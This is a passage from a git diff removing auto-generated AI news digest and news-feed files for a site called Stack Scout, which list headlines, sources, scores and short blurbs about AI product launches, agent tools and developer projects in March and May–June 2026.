4K Images, and Cross-Scene Consistency in Claude and Cursor](https://x.com/MayorKingAI/status/2044455291664695688) -*Aligned News (Scoble)* | 29/05/2026 | Score: 1.00 -Tags: product_launch, tool_update, agent_tool - -> Kling AI launched a dedicated Skill for AI agent workflows, enabling text/image to video generation, 4K image generation, style transfer, and cross-scene consistency with custom elements. Works natively with Claude, Cursor, Copilot, Codex, and OpenClaw. - ---- - -## [Motion Launches Motion API — Connect the AI Motion Design Tool Directly Into Claude, Codex, OpenClaw, and Hermes](https://x.com/_adishj/status/2060028771399500237) -*Aligned News (Scoble)* | 28/05/2026 | Score: 1.00 -Tags: api_update, product_launch, tool_update - -> Motion released the Motion API, enabling one-click integration of the AI motion design tool directly into Claude, Codex, OpenClaw, Hermes, and other AI frameworks. Agents can now generate motion design content as part of automated creative workflows. - ---- - -## [X Square Robot Releases Open-Source WALL-WM World Model For Embodied AI](https://www.digg.com/ai/v4d0ka2f) -*Digg AI* | Score: 1.00 -Tags: product_launch, open_source - ---- - -## [Anthropic Releases Opus 4.8 With Strong Agentic Coding Benchmarks](https://www.digg.com/ai/6gzrebez) -*Digg AI* | Score: 1.00 -Tags: product_launch, agent_tool - ---- - -## [ElevenLabs Launches Dubbing V2 — SOTA Audio-to-Audio Dubbing That Preserves Emotion in 90+ Languages](https://x.com/Carles_Reina/status/2060035887946248616) -*Aligned News (Scoble)* | 28/05/2026 | Score: 1.00 -Tags: api_update, product_launch - -> ElevenLabs introduced Dubbing V2, described as the world's state-of-the-art model for high-quality dubbing. The Audio-to-Audio model preserves the original speaker's emotion and intent across 90+ languages. Available now through ElevenCreative, with API access coming soon. - ---- - -## [Hexo Releases SIA — Open-Source Self-Improving AI That Updates Its Own Weights During Goal Pursuit](https://x.com/kunalbhatia91/status/2060013228231725092) -*Aligned News (Scoble)* | 28/05/2026 | Score: 1.00 -Tags: product_launch, open_source - -> Hexo released SIA, an open-source Self-Improving AI that achieves goals through recursive self-improvement — updating its own capabilities as it works toward a goal, not just calling tools with fixed capabilities. The announcement earned 221 likes and 80,000 views. - ---- - -## [Shift Launches in NYC — AI Economy Startup Offers Free Home Cleaning to Bridge Today's Economy to the AI Abundance Era](https://x.com/bercankilic/status/2060043312606638245) -*Aligned News (Scoble)* | 28/05/2026 | Score: 1.00 -Tags: product_launch, tool_update - -> Shift launched in New York City with a mission to bridge the current economy into the AI economy where goods, services, and leisure become affordable through AI. The launch includes free home cleaning as the entry product. - ---- - -## [minWM: A Full-Stack Open-Source Framework for Real-Time Interactive Video World Models](https://paperswithcode.com/papers/2605.30263) -*Papers With Code* | Score: 0.90 -Tags: open_source, developer_tool - ---- - -## [DeepSeek's Deli Chen releases an LLM continual learning survey paper generated autonomously by the DeliAutoResearch systemIt maps out self-improvement methods like STaR and o1.](https://www.digg.com/ai/xay55qwq) -*Digg AI* | Score: 1.00 -Tags: product_launch - ---- - -## [ElevenLabs Releases Dubbing V2 With Emotion-Preserving Multilingual Audio](https://www.digg.com/ai/hsa7ykbd) -*Digg AI* | Score: 1.00 -Tags: product_launch - ---- - -## [OpenAI launches Rosalind Biodefense, giving U.S. government agencies access to its specialized GPT-Rosalind modelThe initiative focuses on defending against engineered pathogens.](https://www.digg.com/ai/dl0e6ofa) -*Digg AI* | Score: 1.00 -Tags: product_launch - ---- - -## [Anthropic releases Claude Opus 4.8 with improved coding and agentic performance at the same price as Opus 4.7](https://www.digg.com/ai/a6c6c36e-38c7-4420-9908-d435740c4ac8) -*Digg AI* | Score: 1.00 -Tags: product_launch - ---- - -## [100% AI Product Videos Made in Under 5 Minutes Achieve Commercial Quality — Realism Framework Hits New Threshold](https://x.com/Mho_23/status/2048507307466658062) -*Aligned News (Scoble)* | 29/05/2026 | Score: 1.00 -Tags: developer_tool - -> AI-generated product videos made in under 5 minutes are reaching commercial marketing quality, with a realism framework demonstrating results compelling enough for real product ads. The UGC video format has become the clearest commercial use case for AI video generation. - ---- - -## [Garry Tan Endorses Hermes Agent Stack — YC President's 600-Like Post Signals Mainstream Adoption](https://x.com/garrytan/status/2052434681363321056) -*Aligned News (Scoble)* | 29/05/2026 | Score: 1.00 -Tags: open_source - -> Y Combinator President Garry Tan publicly endorsed his OpenClaw/Hermes Agent setup as significantly improved, with the post generating 600+ likes. The endorsement signals that open-source agent coordination has crossed from early adopter into mainstream developer infrastructure. - ---- - diff --git a/data/digest-2026-05-30.md b/data/digest-2026-05-30.md deleted file mode 100644 index 41a7fd5..0000000 --- a/data/digest-2026-05-30.md +++ /dev/null @@ -1,103 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-30** | 15 stories | Auto-generated from 214 archived stories - ---- - -## [Show HN: VT Code – open-source terminal coding agent in Rust](https://github.com/vinhnx/VTCode) -*Hacker News* | 30/05/2026 | Score: 0.82 -Tags: open_source, cli_tool, agent_tool - ---- - -## [OpenAI releases Codex v26.527, enabling Windows computer use and remote desktop control from mobile devicesA new profile interface tracks token activity and usage statistics.](https://www.digg.com/ai/2cvxmdwh) -*Digg AI* | Score: 1.00 -Tags: product_launch, agent_tool - ---- - -## [Oura Ring 5 Launches — 40% Smaller Than Ring 4, Blood Pressure Monitoring, Ships June 4 at $399](https://ouraring.com/blog/oura-ring-5) -*Aligned News (Scoble)* | 30/05/2026 | Score: 1.00 -Tags: product_launch, tool_update - -> Oura launched Ring 5, the world's smallest smart ring at 40% smaller than Ring 4, starting at 2 grams. New features include blood pressure change monitoring, sleep apnea detection, and an AI health coach. Ships June 4, $399. - ---- - -## [Cursor Releases Developer Habits Report on AI Coding Trends](https://www.digg.com/ai/6jh7d90b) -*Digg AI* | Score: 1.00 -Tags: product_launch - ---- - -## [Brilliant Launches Koji AI Tutor to Build Kids' Critical Thinking](https://www.digg.com/ai/9jzt6gwc) -*Digg AI* | Score: 1.00 -Tags: product_launch - ---- - -## [Shift Launches Free NYC Cleaning to Gather Robotics Training Data](https://www.digg.com/ai/5ol0wuf6) -*Digg AI* | Score: 1.00 -Tags: product_launch - ---- - -## [Mythos-Class AI Models Coming to All Customers in Weeks — Anthropic Confirms Safeguards Ready After Restricted Testing](https://www.bloomberg.com/news/articles/2026-05-28/anthropic-plans-wide-release-of-mythos-level-ai-models-in-weeks) -*Aligned News (Scoble)* | 30/05/2026 | Score: 1.00 -Tags: product_launch - -> Anthropic confirmed through Bloomberg and Axios that Mythos-class models — previously limited to select testers under Project Glasswing due to cyber capabilities — will reach general availability in coming weeks after completing safety validation. - ---- - -## [Mystery Company Burns $500M on Claude in One Month — Token Budget Collapse Exposes Enterprise AI Cost Controls Gap](https://www.tomshardware.com/tech-industry/ai/mystery-company-accidentally-blew-500-million-on-claude-ai-in-a-single-month) -*Aligned News (Scoble)* | 30/05/2026 | Score: 1.00 -Tags: api_update - -> An unidentified company accidentally spent $500 million on Claude API in a single month after failing to set usage limits on employee licenses, per Tom's Hardware and WSJ. Amazon's concurrent token leaderboard shutdown after employees gamed it reveals tokenmaxxing as a systemic enterprise risk. - ---- - -## [Bun Rewrote Itself in Rust in 6 Days Using Claude Dynamic Workflows — Jarred Sumner Confirms 'Anthropic Launch Stunt'](https://x.com/jarredsumner/status/2060XXX) -*Aligned News (Scoble)* | 30/05/2026 | Score: 1.00 -Tags: agent_tool - -> Jarred Sumner confirmed that Bun's headline-grabbing Rust rewrite in 6 days was made possible by Claude Code's Dynamic Workflows — and a Bluesky user noted it was 'an Anthropic launch stunt.' The incident illustrates both the genuine capability of agentic coding and the coordinated nature of AI marketing. - ---- - -## [wolfSSL releases a new product; wolfCOSE a zero alloc C embbedded COSE stack](https://github.com/wolfSSL/wolfCOSE) -*Hacker News* | 30/05/2026 | Score: 0.94 -Tags: product_launch - ---- - -## [OpenAI Extends Codex Computer Use To Windows](https://www.digg.com/ai/24n5kcme) -*Digg AI* | Score: 0.94 -Tags: agent_tool - ---- - -## [Brilliant founder Sue Khim launches Koji, an interactive AI tutor that coaches children through math and coding without giving direct answersIt personalizes lessons using a decade of student learning data](https://www.digg.com/ai/hqutws0i) -*Digg AI* | Score: 0.94 -Tags: product_launch - ---- - -## [Kore: Binary File Format Optimized for Modern Data Systems (Open Source)](https://github.com/arunkatherashala/Kore) -*Hacker News* | 30/05/2026 | Score: 0.89 -Tags: open_source - ---- - -## [ChatGPT — Release Notes](https://help.openai.com/en/articles/6825453-chatgpt-release-notes#:~:text=May%2028%2C%202026,models%20are%20sunset.) -*The Verge AI* | Score: 0.76 -Tags: tool_update - ---- - -## [Show HN: Open Envelope – an open schema for defining AI agent teams](https://openenvelope.org/docs/schema/) -*Hacker News* | 28/05/2026 | Score: 0.75 -Tags: agent_tool - ---- - diff --git a/data/digest-2026-05-31.md b/data/digest-2026-05-31.md deleted file mode 100644 index a10904c..0000000 --- a/data/digest-2026-05-31.md +++ /dev/null @@ -1,11 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-31** | 1 stories | Auto-generated from 98 archived stories - ---- - -## [Show HN: Breathe CLI – Paced resonance breathing in the macOS terminal](https://github.com/marekkowalczyk/breathe-cli) -*Hacker News* | 30/05/2026 | Score: 0.77 -Tags: cli_tool - ---- - diff --git a/data/digest-2026-06-01.md b/data/digest-2026-06-01.md deleted file mode 100644 index 11d154f..0000000 --- a/data/digest-2026-06-01.md +++ /dev/null @@ -1,35 +0,0 @@ -# Stack Scout - AI News Digest -**2026-06-01** | 5 stories | Auto-generated from 220 archived stories - ---- - -## [Nvidia announces new AI chip for personal computers](https://www.bbc.com/news/articles/crmp9mppvzro) -*Hacker News* | 01/06/2026 | Score: 1.00 -Tags: product_launch - ---- - -## [AI Agent Guidelines for CS336 at Stanford](https://github.com/stanford-cs336/assignment1-basics/blob/main/CLAUDE.md) -*Hacker News* | 01/06/2026 | Score: 0.91 -Tags: agent_tool - ---- - -## [OpenAI frontier models and Codex are now available on AWS](https://openai.com/index/openai-frontier-models-and-codex-are-now-available-on-aws/) -*Hacker News* | 01/06/2026 | Score: 0.83 -Tags: product_launch - ---- - -## [Malicious npm packages detected across Red Hat Cloud Services](https://github.com/RedHatInsights/javascript-clients/issues/492) -*Hacker News* | 01/06/2026 | Score: 0.83 -Tags: cli_tool - ---- - -## [Movwin: My (Unpublished) TUI Framework](https://movq.de/blog/postings/2026-05-29/0/POSTING-en.html) -*Hacker News* | 30/05/2026 | Score: 0.77 -Tags: developer_tool - ---- - diff --git a/data/digest-2026-06-02.md b/data/digest-2026-06-02.md deleted file mode 100644 index 9756289..0000000 --- a/data/digest-2026-06-02.md +++ /dev/null @@ -1,29 +0,0 @@ -# Stack Scout - AI News Digest -**2026-06-02** | 4 stories | Auto-generated from 241 archived stories - ---- - -## [Microsoft announces Scout, an autonomous AI agent built on OpenClaw](https://www.computerworld.com/article/4180103/microsoft-unveils-scout-an-autonomous-ai-agent-built-on-openclaw.html) -*Hacker News* | 02/06/2026 | Score: 1.00 -Tags: product_launch, agent_tool - ---- - -## [Alphabet announces $80B equity capital raise to expand AI infra and compute](https://abc.xyz/investor/news/news-details/2026/Alphabet-Announces-Proposed-80-Billion-Equity-Capital-Raise-to-Expand-AI-Infrastructure-and-Compute-2026-b0myAMewCa/default.aspx) -*Hacker News* | 01/06/2026 | Score: 1.00 -Tags: product_launch - ---- - -## [HP re-releases classic computer science calculator: The HP-16C](https://hpcalcs.com/product/hp-16c-collectors-edition/) -*Hacker News* | 02/06/2026 | Score: 0.94 -Tags: product_launch - ---- - -## [Apple rejected my dictation app for using the accessibility API](https://www.mitmllc.com/blog/apple-rejected-my-dictation-app/) -*Hacker News* | 02/06/2026 | Score: 0.86 -Tags: api_update - ---- - diff --git a/data/digest-2026-06-03.md b/data/digest-2026-06-03.md deleted file mode 100644 index 5dbd671..0000000 --- a/data/digest-2026-06-03.md +++ /dev/null @@ -1,41 +0,0 @@ -# Stack Scout - AI News Digest -**2026-06-03** | 6 stories | Auto-generated from 269 archived stories - ---- - -## [Ableton Extensions SDK](https://www.ableton.com/en/live/extensions/) -*Hacker News* | 03/06/2026 | Score: 0.82 -Tags: api_update, developer_tool - ---- - -## [Gooey: A GPU-accelerated UI framework for Zig](https://github.com/duanebester/gooey) -*Hacker News* | 03/06/2026 | Score: 0.94 -Tags: developer_tool - ---- - -## [Capstone – multi-platform, multi-architecture disassembly framework](https://www.capstone-engine.org/) -*Hacker News* | 03/06/2026 | Score: 0.94 -Tags: developer_tool - ---- - -## [Skyvern (YC S23) Is Hiring Open-Source Loving DevRel Engineers](https://www.ycombinator.com/companies/skyvern/jobs/1qRTlVx-founding-developer-marketing-open-source-ai) -*Hacker News* | 03/06/2026 | Score: 0.89 -Tags: open_source - ---- - -## [Roku LT Operating System open source distribution](https://blog.roku.com/developer/roku-lt-os) -*Hacker News* | 03/06/2026 | Score: 0.86 -Tags: open_source - ---- - -## [Journey to JPEG XL: open-source experiments shaped the future of image coding](https://opensource.googleblog.com/2026/06/journey-to-jpeg-xl-how-open-source-experiments-shaped-the-future-of-image-coding.html) -*Hacker News* | 03/06/2026 | Score: 0.66 -Tags: open_source - ---- - diff --git a/data/digest-2026-06-04.md b/data/digest-2026-06-04.md deleted file mode 100644 index 0ee2879..0000000 --- a/data/digest-2026-06-04.md +++ /dev/null @@ -1,35 +0,0 @@ -# Stack Scout - AI News Digest -**2026-06-04** | 5 stories | Auto-generated from 224 recent stories - ---- - -## [Anthropic's open-source framework for AI-powered vulnerability discovery](https://github.com/anthropics/defending-code-reference-harness) -*Hacker News* | 04/06/2026 | Score: 0.56 -Tags: open_source, developer_tool - ---- - -## [Ableton Extensions SDK](https://www.ableton.com/en/live/extensions/) -*Hacker News* | 03/06/2026 | Score: 0.56 -Tags: api_update, developer_tool - ---- - -## [Show HN: Open Terminal – A Bloomberg Style App for Research](https://tesseractanalytics.ai/) -*Hacker News* | 04/06/2026 | Score: 0.56 -Tags: cli_tool - ---- - -## [Meta's ships facial recognition on smart glasses](https://www.buchodi.com/meta-glasses-facial-recognition/) -*Hacker News* | 04/06/2026 | Score: 0.48 -Tags: tool_update - ---- - -## [Journey to JPEG XL: open-source experiments shaped the future of image coding](https://opensource.googleblog.com/2026/06/journey-to-jpeg-xl-how-open-source-experiments-shaped-the-future-of-image-coding.html) -*Hacker News* | 03/06/2026 | Score: 0.48 -Tags: open_source - ---- - diff --git a/data/digest-2026-06-05.md b/data/digest-2026-06-05.md deleted file mode 100644 index 7509375..0000000 --- a/data/digest-2026-06-05.md +++ /dev/null @@ -1,35 +0,0 @@ -# Stack Scout - AI News Digest -**2026-06-05** | 5 stories | Auto-generated from 186 recent stories - ---- - -## [Anthropic's open-source framework for AI-powered vulnerability discovery](https://github.com/anthropics/defending-code-reference-harness) -*Hacker News* | 04/06/2026 | Score: 0.56 -Tags: open_source, developer_tool - ---- - -## [Open Code Review – An AI-powered code review CLI tool](https://github.com/alibaba/open-code-review) -*Hacker News* | 05/06/2026 | Score: 0.48 -Tags: cli_tool - ---- - -## [Meta's ships facial recognition on smart glasses](https://www.buchodi.com/meta-glasses-facial-recognition/) -*Hacker News* | 04/06/2026 | Score: 0.48 -Tags: tool_update - ---- - -## [databow: a Rust CLI to query any database with an ADBC driver](https://columnar.tech/blog/introducing-databow//) -*Hacker News* | 03/06/2026 | Score: 0.48 -Tags: cli_tool - ---- - -## [Branchless Quicksort faster than std:sort and pdqsort with C and C++ API](https://tiki.li/blog/blqsort) -*Hacker News* | 02/06/2026 | Score: 0.48 -Tags: api_update - ---- - diff --git a/data/digest-2026-06-06.md b/data/digest-2026-06-06.md deleted file mode 100644 index ac59722..0000000 --- a/data/digest-2026-06-06.md +++ /dev/null @@ -1,5 +0,0 @@ -# Stack Scout - AI News Digest -**2026-06-06** | 0 stories | Auto-generated from 138 recent stories - ---- - diff --git a/data/methodology-manifest.json b/data/methodology-manifest.json index 0f23911..f57652d 100644 --- a/data/methodology-manifest.json +++ b/data/methodology-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Methodology", - "generatedAt": "2026-06-06", - "updatedAt": "2026-06-06", + "generatedAt": "2026-06-04", + "updatedAt": "2026-06-04", "thesis": "Stack Scout is a public guide, not a benchmark lab. We badge selectively, update from official sources where possible, and avoid pretending every fast-moving tool deserves a fixed numeric score.", "principles": [ { diff --git a/data/news-feed-2026-03-15.json b/data/news-feed-2026-03-15.json deleted file mode 100644 index 86e7524..0000000 --- a/data/news-feed-2026-03-15.json +++ /dev/null @@ -1,55 +0,0 @@ -{ - "generated": "2026-06-05T00:44:28.529Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-03-15", - "article_count": 3, - "archived_story_count": 55, - "articles": [ - { - "title": "Show HN: Open-source playground to red-team AI agents with exploits published", - "url": "https://github.com/fabraix/playground", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.8799999999999999, - "date": "2026-03-15T22:29:46.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Chrome DevTools MCP (2025)", - "url": "https://developer.chrome.com/blog/chrome-devtools-mcp-debug-your-browser-session", - "source": "Hacker News", - "tags": [ - "mcp" - ], - "matching_tags": [ - "mcp" - ], - "importance": 0.81, - "date": "2026-03-15T19:12:53.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Office.eu launches as Europe's sovereign office platform", - "url": "https://office.eu/media/pressrelease-20260304", - "source": "Hacker News", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.7599999999999999, - "date": "2026-03-15T18:22:36.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-03-16.json b/data/news-feed-2026-03-16.json deleted file mode 100644 index f7b30f3..0000000 --- a/data/news-feed-2026-03-16.json +++ /dev/null @@ -1,134 +0,0 @@ -{ - "generated": "2026-06-05T00:44:28.694Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-03-16", - "article_count": 8, - "archived_story_count": 67, - "articles": [ - { - "title": "Apideck CLI – An AI-agent interface with much lower context consumption than MCP", - "url": "https://www.apideck.com/blog/mcp-server-eating-context-window-cli-alternative", - "source": "Hacker News", - "tags": [ - "mcp", - "cli_tool", - "agent_tool" - ], - "matching_tags": [ - "mcp", - "cli_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-03-16T15:25:36.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Speed at the cost of quality: Study of use of Cursor AI in open source projects", - "url": "https://arxiv.org/abs/2511.04427", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.87, - "date": "2026-03-16T17:07:37.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Nvidia Launches Vera CPU, Purpose-Built for Agentic AI", - "url": "https://nvidianews.nvidia.com/news/nvidia-launches-vera-cpu-purpose-built-for-agentic-ai", - "source": "Hacker News", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.84, - "date": "2026-03-16T20:01:02.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Nango (YC W23, API Access for Agents and Apps) Is Hiring", - "url": "https://jobs.ashbyhq.com/Nango", - "source": "Hacker News", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 0.82, - "date": "2026-03-16T12:03:13.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "SpiceCrypt: A Python library for decrypting LTspice encrypted model files", - "url": "https://github.com/jtsylve/spice-crypt", - "source": "Hacker News", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.7599999999999999, - "date": "2026-03-15T07:11:32.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Event Publisher enables event integration between Keycloak and OpenFGA", - "url": "https://github.com/embesozzi/keycloak-openfga-event-publisher", - "source": "Hacker News", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 0.7, - "date": "2026-03-16T14:21:07.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Lazycut: A simple terminal video trimmer using FFmpeg", - "url": "https://github.com/emin-ozata/lazycut", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.7, - "date": "2026-03-16T12:05:08.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Leanstral: Open-source agent for trustworthy coding and formal proof engineering", - "url": "https://mistral.ai/news/leanstral", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.6799999999999999, - "date": "2026-03-16T20:59:40.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-03-17.json b/data/news-feed-2026-03-17.json deleted file mode 100644 index 56073d6..0000000 --- a/data/news-feed-2026-03-17.json +++ /dev/null @@ -1,237 +0,0 @@ -{ - "generated": "2026-06-05T00:44:28.931Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-03-17", - "article_count": 15, - "archived_story_count": 140, - "articles": [ - { - "title": "Show HN: Crust – A CLI framework for TypeScript and Bun", - "url": "https://github.com/chenxin-yan/crust", - "source": "Hacker News", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.84, - "date": "2026-03-17T04:43:29.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "World launches tool to verify humans behind AI shopping agents", - "url": "https://techcrunch.com/2026/03/17/world-launches-tool-to-verify-humans-behind-ai-shopping-agents/", - "source": "TechCrunch AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-03-17T15:00:00.000Z", - "summary": "As AI agents take the reins for online shoppers, Sam Altman's unconventional startup is looking to expand its verification offerings to support agentic commerce.", - "category": "ai_tools" - }, - { - "title": "Picsart now allows creators to ‘hire’ AI assistants through agent marketplace", - "url": "https://techcrunch.com/2026/03/16/picsart-now-allows-creators-to-hire-ai-assistants-through-agent-marketplace/", - "source": "TechCrunch AI", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-03-17T04:01:00.000Z", - "summary": "Picsart's AI agent marketplace will launch with four agents, then add more agents each week.", - "category": "ai_tools" - }, - { - "title": "Nvidia’s version of OpenClaw could solve its biggest problem: security", - "url": "https://techcrunch.com/2026/03/16/nvidias-version-of-openclaw-could-solve-its-biggest-problem-security/", - "source": "TechCrunch AI", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-03-16T22:45:51.000Z", - "summary": "Nvidia announced an open enterprise AI agent platform, called NemoClaw, that is built off of viral OpenClaw.", - "category": "ai_tools" - }, - { - "title": "How to watch Jensen Huang’s Nvidia GTC 2026 keynote — and what to expect", - "url": "https://techcrunch.com/2026/03/16/nvidia-gtc-how-to-watch-jensen-huang-2026-keynote/", - "source": "TechCrunch AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-03-16T17:51:46.000Z", - "summary": "GTC is Nvidia's flagship annual event, where the chipmaker typically announces new products, partnerships, and its vision for the future of computing. Huang's keynote will focus on Nvidia's role in the future of computing and AI.", - "category": "ai_tools" - }, - { - "title": "China’s OpenClaw Boom Is a Gold Rush for AI Companies", - "url": "https://www.wired.com/story/china-is-going-all-in-on-openclaw/", - "source": "Wired AI", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.9099999999999999, - "date": "2026-03-13T12:00:00.000Z", - "summary": "Hype around the open source agent is driving people to rent cloud servers and buy AI subscriptions just to try it, creating a windfall for tech companies.", - "category": "ai_tools" - }, - { - "title": "Mistral AI Releases Forge", - "url": "https://mistral.ai/news/forge", - "source": "Hacker News", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.79, - "date": "2026-03-17T21:04:26.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Show HN: Horizon – GPU-accelerated infinite-canvas terminal in Rust", - "url": "https://github.com/peters/horizon", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.78, - "date": "2026-03-17T18:14:24.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Chrome extension adjusts video speed based on how fast the speaker is talking", - "url": "https://github.com/ywong137/speech-speed", - "source": "Hacker News", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.78, - "date": "2026-03-13T06:18:17.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Retraction: After a routine code rejection, an AI agent published a hit piece on someone by name", - "url": "https://arstechnica.com/ai/2026/02/after-a-routine-code-rejection-an-ai-agent-published-a-hit-piece-on-someone-by-name/", - "source": "Ars Technica AI", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 0.78, - "date": "2026-02-13T19:40:21.000Z", - "summary": "This story has been retracted", - "category": "tech_general" - }, - { - "title": "Node.js needs a virtual file system", - "url": "https://blog.platformatic.dev/why-nodejs-needs-a-virtual-file-system", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.7, - "date": "2026-03-17T14:28:37.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Kagi Translate now supports LinkedIn Speak as an output language", - "url": "https://translate.kagi.com/?from=en&to=LinkedIn+speak", - "source": "Hacker News", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 0.7, - "date": "2026-03-17T04:39:42.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Reverse-engineering Viktor and making it Open Source", - "url": "https://matijacniacki.com/blog/openviktor", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.6799999999999999, - "date": "2026-03-17T08:15:34.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Building a Shell", - "url": "https://healeycodes.com/building-a-shell", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.62, - "date": "2026-03-17T09:52:34.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Show HN: Droeftoeter, a Terminal Coding Toy", - "url": "https://github.com/whtspc/droeftoeter", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.62, - "date": "2026-03-13T04:16:26.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-03-18.json b/data/news-feed-2026-03-18.json deleted file mode 100644 index bceb1ea..0000000 --- a/data/news-feed-2026-03-18.json +++ /dev/null @@ -1,160 +0,0 @@ -{ - "generated": "2026-06-05T00:44:29.089Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-03-18", - "article_count": 10, - "archived_story_count": 90, - "articles": [ - { - "title": "The leaderboard “you can’t game,” funded by the companies it ranks", - "url": "https://techcrunch.com/video/the-leaderboard-you-cant-game-funded-by-the-companies-it-ranks/", - "source": "TechCrunch AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-03-18T16:30:00.000Z", - "summary": "Artificial intelligence models are multiplying fast, and competition is stiff. With so many players crowding the space, which one will be the best — and who decides that? Arena, formerly LM Arena, has emerged as the de facto public leaderboard for frontier LLMs, influencing funding, launches, and PR cycles. In just seven months, the startup went from a UC Berkeley PhD research […]", - "category": "ai_tools" - }, - { - "title": "The PhD students who became the judges of the AI industry", - "url": "https://techcrunch.com/podcast/the-phd-students-who-became-the-judges-of-the-ai-industry/", - "source": "TechCrunch AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-03-18T15:00:00.000Z", - "summary": "Artificial intelligence models are multiplying fast, and competition is stiff. With so many players crowding the space, which one will be the best — and who decides that? Arena, formerly LM Arena, has emerged as the de facto public leaderboard for frontier LLMs, influencing funding, launches, and PR cycles. In just seven months, the startup went from a UC Berkeley PhD research […]", - "category": "ai_tools" - }, - { - "title": "Meta is having trouble with rogue AI agents", - "url": "https://techcrunch.com/2026/03/18/meta-is-having-trouble-with-rogue-ai-agents/", - "source": "TechCrunch AI", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 0.99, - "date": "2026-03-18T23:42:46.000Z", - "summary": "A rogue AI agent inadvertently exposed Meta company and user data to engineers who didn't have permission to see it.", - "category": "ai_tools" - }, - { - "title": "Launch an autonomous AI agent with sandboxed execution in 2 lines of code", - "url": "https://amaiya.github.io/onprem/examples_agent.html", - "source": "Hacker News", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 0.98, - "date": "2026-03-18T01:10:19.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Nightingale – open-source karaoke app that works with any song on your computer", - "url": "https://nightingale.cafe/", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.7599999999999999, - "date": "2026-03-18T08:06:24.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "A ngrok-style secure tunnel server written in Rust and Open Source", - "url": "https://github.com/joaoh82/rustunnel", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.71, - "date": "2026-03-18T14:00:43.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Show HN: Tmux-IDE, OSS agent-first terminal IDE", - "url": "https://tmux.thijsverreck.com", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - 